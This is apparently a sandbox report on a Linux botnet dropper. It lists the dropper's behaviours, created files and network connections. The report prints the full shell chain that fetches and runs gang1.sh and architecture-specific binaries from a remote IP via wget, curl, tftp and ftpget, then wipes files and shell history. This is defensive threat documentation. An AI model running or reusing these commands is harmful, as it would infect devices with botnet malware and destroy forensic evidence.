Technical Information
Malicious functions:
Launches itself as a daemon
Launches processes:
- sh -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.80.39.242/gang1.sh; curl -O http://45.80.39.242/gang1.sh; chmod 777 gang1.sh; sh gang1.sh; tftp 45.80.39.242 -c get efad.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.80.39.242; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.80.39.242 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c
- wget http://45.80.39.242/gang1.sh
- chmod 777 gang1.sh
- sh gang1.sh
- wget http://webserver.c/Onezz.mips
- chmod +x Onezz.mips
- ./Onezz.mips
- rm -rf Onezz.mips
- wget http://webserver.c/Onezz.mpsl
- chmod +x Onezz.mpsl
- ./Onezz.mpsl
- rm -rf Onezz.mpsl
Performs operations with the file system:
Modifies file access rights:
- /tmp/gang1.sh
Creates or modifies files:
- /tmp/gang1.sh
- /tmp/gang1.sh.1
- /tmp/gang1.sh.2
- /tmp/gang1.sh.2.1
- /tmp/gang1.sh.2.2
- /tmp/gang1.sh.3
- /tmp/gang1.sh.3.1
- /tmp/gang1.sh.3.2
- /tmp/gang1.sh.4
- /tmp/gang1.sh.4.1
- /tmp/gang1.sh.4.2
- /tmp/gang1.sh.5
- /tmp/gang1.sh.5.1
- /tmp/gang1.sh.5.2
- /tmp/gang1.sh.6
- /tmp/gang1.sh.6.1
- /tmp/gang1.sh.7
- /tmp/gang1.sh.7.1
- /tmp/gang1.sh.7.2
- /tmp/gang1.sh.8
- /tmp/gang1.sh.8.1
- /tmp/gang1.sh.9
- /tmp/gang1.sh.9.1
- /tmp/gang1.sh.10
- /tmp/gang1.sh.9.2
- /tmp/gang1.sh.10.1
- /tmp/gang1.sh.11
- /tmp/gang1.sh.10.2
- /tmp/gang1.sh.11.1
- /tmp/gang1.sh.12
- /tmp/gang1.sh.12.1
- /tmp/gang1.sh.12.2
- /tmp/gang1.sh.13
- /tmp/gang1.sh.13.1
- /tmp/gang1.sh.13.2
Deletes files:
- /tmp/Onezz.mips
Network activity:
Establishes connection:
- 8.#.8.8:53
- 45.##.39.242:1337
- <LOCAL_DNS_SERVER>
- 127.0.0.1:53
HTTP GET requests:
- 45.##.#9.242/gang1.sh
DNS ASK:
- we##erver.c
Sends data to the following servers:
- 45.##.39.242:1337
Receives data from the following servers:
- 45.##.39.242:1337
- <LOCAL_DNS_SERVER>
